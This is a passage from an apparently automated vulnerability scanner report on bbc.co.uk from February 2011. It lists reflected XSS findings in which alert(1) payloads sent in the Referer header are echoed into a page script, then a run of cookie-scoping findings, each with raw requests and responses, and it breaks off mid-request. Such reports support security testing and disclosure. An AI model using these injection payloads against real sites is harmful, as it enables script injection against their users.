<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476233000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=fb6fe'-alert(1)-'ec6e2db7529',
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12435117',
       assetType: 'story',
       uri:
...[SNIP]...

1.101. http://www.bbc.co.uk/news/world-us-canada-12436383 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12436383

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78bef'-alert(1)-'fa7f6377061 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12436383 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=78bef'-alert(1)-'fa7f6377061

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:53 GMT
Keep-Alive: timeout=10, max=752
Expires: Sat, 12 Feb 2011 02:03:53 GMT
Connection: close
Set-Cookie: BBC-UID=941db5855e0a1809fade5d8581efda75d82b52d7a0c0f1e94bfb33cf1325b3b20Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:53 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=941db5855e0a1809fade5d8581efda75d82b52d7a0c0f1e94bfb33cf1325b3b20Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:53 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476233000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=78bef'-alert(1)-'fa7f6377061',
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12436383',
       assetType: 'story',
       uri:
...[SNIP]...

1.102. http://www.bbc.co.uk/news/world-us-canada-12437116 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12437116

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66024'-alert(1)-'9865873deed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12437116 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=66024'-alert(1)-'9865873deed

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:56 GMT
Keep-Alive: timeout=10, max=705
Expires: Sat, 12 Feb 2011 02:03:56 GMT
Connection: close
Set-Cookie: BBC-UID=549d15654ebad86c879359326178e5ebf75cd5ad6050b1ba74ab5a2544018ccc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:56 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=549d15654ebad86c879359326178e5ebf75cd5ad6050b1ba74ab5a2544018ccc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:56 GMT; path=/; domain=bbc.co.uk;
Content-Length: 69006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476236000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=66024'-alert(1)-'9865873deed',
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437116',
       assetType: 'story',
       uri:
...[SNIP]...

1.103. http://www.bbc.co.uk/news/world-us-canada-12437121 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12437121

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70c89'-alert(1)-'e5af21b3e81 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12437121 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=70c89'-alert(1)-'e5af21b3e81

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:54 GMT
Keep-Alive: timeout=10, max=793
Expires: Sat, 12 Feb 2011 02:03:54 GMT
Connection: close
Set-Cookie: BBC-UID=142da5957edab83a5a9eb97e5104ea6d0c1f1bc590707109bb7bc38ee02e44dc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:54 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=142da5957edab83a5a9eb97e5104ea6d0c1f1bc590707109bb7bc38ee02e44dc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:54 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476234000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=70c89'-alert(1)-'e5af21b3e81',
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437121',
       assetType: 'story',
       uri:
...[SNIP]...

2. Cookie scoped to parent domain
There are 94 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie header, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


2.1. http://www.bbc.co.uk/go/rss/int/news/-/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/ HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:20 GMT
Location: http://www.bbc.co.uk/news/
Keep-Alive: timeout=4, max=192
Connection: close
Set-Cookie: BBC-UID=24fd65f58e0ac24cb82fc0eb51e0bc46540efbacb0c01134044f6436d3ca799a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 210

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/">here</a>.</p>
</bod
...[SNIP]...

2.2. http://www.bbc.co.uk/go/rss/int/news/-/news/12437486

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/12437486

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/12437486 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:20 GMT
Location: http://www.bbc.co.uk/news/12437486
Keep-Alive: timeout=4, max=193
Connection: close
Set-Cookie: BBC-UID=e47dd5958e2ad26c7ba702b3c1597735ae8a2ee770b041b4f4ef6916bf1e10370Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 218

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/12437486">here</a>.</
...[SNIP]...

2.3. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12427680

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12427680

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/business-12427680 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:21 GMT
Location: http://www.bbc.co.uk/news/business-12427680
Keep-Alive: timeout=4, max=200
Connection: close
Set-Cookie: BBC-UID=d43dc5654e9ab2cd094d0e7da11d0a5e72c4ea37b0a0c1f4e48f966f20146f750Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:21 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/business-12427680">he
...[SNIP]...

2.4. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12428689

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12428689

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/business-12428689 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:21 GMT
Location: http://www.bbc.co.uk/news/business-12428689
Keep-Alive: timeout=4, max=189
Connection: close
Set-Cookie: BBC-UID=f4fd75354e4ab2dddeaca0d501b2b6d1d23f5512b0f0e114147fa486c8e07e8a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:21 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/business-12428689">he
...[SNIP]...

2.5. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12431066

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12431066

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/business-12431066 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:21 GMT
Location: http://www.bbc.co.uk/news/business-12431066
Keep-Alive: timeout=4, max=200
Connection: close
Set-Cookie: BBC-UID=e40d05b58e6ac2cdaf50e8baa1c5ffaddef3626da050a164149f39d70d56a16f0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:21 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/business-12431066">he
...[SNIP]...

2.6. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12431281

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12431281

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/business-12431281 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:21 GMT
Location: http://www.bbc.co.uk/news/business-12431281
Keep-Alive: timeout=4, max=194
Connection: close
Set-Cookie: BBC-UID=64ddd595fe2af25d8e9c00577167ac462ebfe6e680e0c124d49f24b628303eba0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:21 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/business-12431281">he
...[SNIP]...

2.7. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12434447

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12434447

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/business-12434447 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:21 GMT
Location: http://www.bbc.co.uk/news/business-12434447
Keep-Alive: timeout=4, max=124
Connection: close
Set-Cookie: BBC-UID=e4fd75a5aeaab2cdbecc50f8b14a5636a812441720406114848fc41638f03e2a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:21 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/business-12434447">he
...[SNIP]...

2.8. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12434453

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12434453

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/business-12434453 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:21 GMT
Location: http://www.bbc.co.uk/news/business-12434453
Keep-Alive: timeout=4, max=184
Connection: close
Set-Cookie: BBC-UID=64dd45c58e2a220d5efcc0f9e19cca8914bcdb88f040d194544fb4a638202eca0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:21 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/business-12434453">he
...[SNIP]...

2.9. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12435838

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12435838

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/business-12435838 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:22 GMT
Location: http://www.bbc.co.uk/news/business-12435838
Keep-Alive: timeout=4, max=178
Connection: close
Set-Cookie: BBC-UID=240d45354e4a329e8a46c44671921e3579f0406e9050a184e47f4022ec18388c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/business-12435838">he
...[SNIP]...

2.10. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12437194

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12437194

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/business-12437194 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:22 GMT
Location: http://www.bbc.co.uk/news/business-12437194
Keep-Alive: timeout=4, max=179
Connection: close
Set-Cookie: BBC-UID=b43da5b51e1aa20e5eacf0afc19548b7dc5aa148300021a4f48f6476e8404eba0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/business-12437194">he
...[SNIP]...

2.11. http://www.bbc.co.uk/go/rss/int/news/-/news/education-12429152

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/education-12429152

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/education-12429152 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:23 GMT
Location: http://www.bbc.co.uk/news/education-12429152
Keep-Alive: timeout=4, max=197
Connection: close
Set-Cookie: BBC-UID=84fdd5159ecaa24f72ece65fa1e56a4b3e791499f090e11454bf9adff5c19c8c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:23 GMT; path=/; domain=bbc.co.uk;
Content-Length: 228

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/education-12429152">h
...[SNIP]...

2.12. http://www.bbc.co.uk/go/rss/int/news/-/news/entertainment-arts-12426999

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/entertainment-arts-12426999

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/entertainment-arts-12426999 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:24 GMT
Location: http://www.bbc.co.uk/news/entertainment-arts-12426999
Keep-Alive: timeout=4, max=196
Connection: close
Set-Cookie: BBC-UID=d44df505eeea4350888fc1df110f1ed03dc59d3410e07194f4af2436d35a19fa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:24 GMT; path=/; domain=bbc.co.uk;
Content-Length: 237

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/entertainment-arts-12
...[SNIP]...

2.13. http://www.bbc.co.uk/go/rss/int/news/-/news/entertainment-arts-12427905

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/entertainment-arts-12427905

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/entertainment-arts-12427905 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:24 GMT
Location: http://www.bbc.co.uk/news/entertainment-arts-12427905
Keep-Alive: timeout=4, max=200
Connection: close
Set-Cookie: BBC-UID=c46d8575ae4af330bff0394fc1e1677650114d72b0e0f13414cff9078d46a1cf0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:24 GMT; path=/; domain=bbc.co.uk;
Content-Length: 237

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/entertainment-arts-12
...[SNIP]...

2.14. http://www.bbc.co.uk/go/rss/int/news/-/news/entertainment-arts-12428196

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/entertainment-arts-12428196

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/entertainment-arts-12428196 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:24 GMT
Location: http://www.bbc.co.uk/news/entertainment-arts-12428196
Keep-Alive: timeout=4, max=195
Connection: close
Set-Cookie: BBC-UID=c4ed35856e8a43c00fa05a80c18bc48a73cd8815c000b13464ffc937cd7611cf0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:24 GMT; path=/; domain=bbc.co.uk;
Content-Length: 237

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/entertainment-arts-12
...[SNIP]...

2.15. http://www.bbc.co.uk/go/rss/int/news/-/news/health-12401970

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/health-12401970

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/health-12401970 HTTP/1.1
